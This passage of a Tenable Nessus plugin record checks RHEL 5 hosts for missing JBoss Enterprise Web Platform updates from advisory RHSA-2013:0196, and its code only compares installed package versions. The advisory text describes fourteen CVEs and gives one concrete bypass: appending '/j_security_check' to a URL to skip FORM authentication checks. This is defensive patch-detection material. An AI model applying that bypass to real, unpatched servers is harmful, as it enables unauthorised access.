"p-cpe:/a:redhat:enterprise_linux:spring2-beans", "p-cpe:/a:redhat:enterprise_linux:spring2-context", "p-cpe:/a:redhat:enterprise_linux:spring2-core", "p-cpe:/a:redhat:enterprise_linux:wss4j", "p-cpe:/a:redhat:enterprise_linux:xerces-j2", "p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts", "p-cpe:/a:redhat:enterprise_linux:xml-commons", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which10", "p-cpe:/a:redhat:enterprise_linux:xml-commons-which11", 
"p-cpe:/a:redhat:enterprise_linux:xml-security", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2013-0196.NASL", "href": "https://www.tenable.com/plugins/nessus/78946", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0196. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78946);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5066\", \"CVE-2011-1096\", \"CVE-2011-2487\", \"CVE-2011-2730\", \"CVE-2011-2908\", \"CVE-2011-4575\", \"CVE-2012-0034\", \"CVE-2012-0874\", \"CVE-2012-2377\", \"CVE-2012-2379\", \"CVE-2012-3369\", \"CVE-2012-3370\", \"CVE-2012-3546\", \"CVE-2012-5478\");\n script_xref(name:\"RHSA\", value:\"2013:0196\");\n\n script_name(english:\"RHEL 5 : JBoss EWP (RHSA-2013:0196)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple\nsecurity issues, various bugs, and add several enhancements are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Web Platform 5.2.0 release serves as a\nreplacement for JBoss Enterprise Web Platform 5.1.2, and includes bug\nfixes and enhancements. 
As JBoss Enterprise Web Platform is a subset\nof JBoss Enterprise Application Platform, refer to the JBoss\nEnterprise Application Platform 5.2.0 Release Notes for information on\nthe most significant of these changes. The Release Notes will be\navailable shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block\nciphers were used in CBC mode could allow a remote attacker to conduct\nchosen-ciphertext attacks, leading to the recovery of the entire plain\ntext of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing\nsymmetric keys (for XML encryption), allowing a remote attacker to\nrecover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL)\nexpressions twice, allowing a remote attacker to execute arbitrary\ncode in the context of the application server, or to obtain sensitive\ninformation from the server. Manual action is required to apply this\nfix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by\na Supporting Token, but not whether the correct token was used. A\nremote attacker could transmit confidential information without the\nappropriate security, and potentially circumvent access controls on\nweb services exposed via Apache CXF. Refer to the Solution section for\ndetails. 
(CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another\ncomponent that calls request.setUserPrincipal() before the call to\nFormAuthenticator# authenticate() (such as the Single-Sign-On valve),\nit was possible to bypass the security constraint checks in the FORM\nauthenticator by appending '/ j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote\nattacker to hijack the authenticated JMX Console session of an\nadministrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against\nvictims using the JMX Console. (CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential\nif no security context was provided. Depending on the deployed\napplications, this could possibly allow a remote attacker to hijack\nthe credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific\nroles did not actually restrict access, allowing remote attackers with\nvalid JMX Invoker credentials to perform JMX operations accessible to\nroles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing\nlocal users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain\ntext when an exception was thrown. This could lead to the exposure of\nauthentication credentials if local users had permissions to read the\nlog file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow\nunauthenticated access by default in some profiles. The security\ninterceptor's second layer of authentication prevented direct\nexploitation of this flaw. 
If the interceptor was misconfigured or\ninadvertently disabled, this flaw could lead to arbitrary code\nexecution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication\nwhen a JGroups channel was started, allowing attackers on the adjacent\nnetwork to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call\nif a null password was provided. In non-default configurations this\ncould possibly lead to a remote attacker hijacking a\npreviously-authenticated user's session. (CVE-2012-3369)\n\nRed Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum\nfor reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project\nfor reporting CVE-2012-2379; and Tyler Krpata for reporting\nCVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by\nCarlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of\nRed Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and\nCVE-2012-2377 was discovered by Red Hat.\"\n );\n # https://access.redhat.com/knowledge/docs/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-us/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2379\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3546\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-5478\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3370\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0874\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:aopalliance\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:bsh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bsh2-bsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:google-guice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-annotations-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-entitymanager-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate3-search-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jacorb-jboss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-aop2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-bootstrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cache-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cl\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-cluster-ha-server-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-common-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-eap5-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-ext-api-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-interceptors\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-metrics-deployer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-timeout-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb3-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jacc-1.1-api\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jad-1.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaspi-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-javaee-poms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jaxrpc-api_1.1_spec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jca-1.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jms-1.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-jpa-deployers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-reflect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-seam2-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-transaction-1.0.1-api\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-vfs2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-tp-licenses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-web-ws-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-ws-cxf-ewp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbosssx2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-el-1.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-jsp-2.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb-servlet-2.5-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-framework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossws-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jgroups\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jopr-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-hibernate-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-as-5-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jopr-jboss-cache-v3-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-ewp-docs-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-core-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-aop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-beans\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-context\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:spring2-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-security\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0196\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL5\", rpm:\"jboss-seam2-\")) || rpm_exists(rpm:\"jbossas-welcome-content-eap\")) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EWP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"aopalliance-1.0-5.2.jdk6.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"apache-cxf-2.2.12-6.1.patch_04.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bsh2-2.0-0.b4.15.1.patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bsh2-bsf-2.0-0.b4.15.1.patch01.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glassfish-jaxb-2.1.12-12_patch_03.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"google-guice-2.0-3.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-3.3.2-1.5.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-annotations-3.4.0-3.3.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-annotations-javadoc-3.4.0-3.3.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
reference:\"hibernate3-entitymanager-3.4.0-4.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-entitymanager-javadoc-3.4.0-4.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-javadoc-3.3.2-1.5.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-search-3.1.1-2.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate3-search-javadoc-3.1.1-2.4.GA_CP05.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jacorb-jboss-2.3.2-2.jboss_1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"javassist-3.12.0-6.SP1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-aop2-2.1.6-5.CP06.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-bootstrap-1.0.2-1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cache-core-3.2.11-1.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cache-pojo-3.0.1-1.1.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cl-2.0.11-1.GA.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-cluster-ha-server-api-1.2.1-2.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", 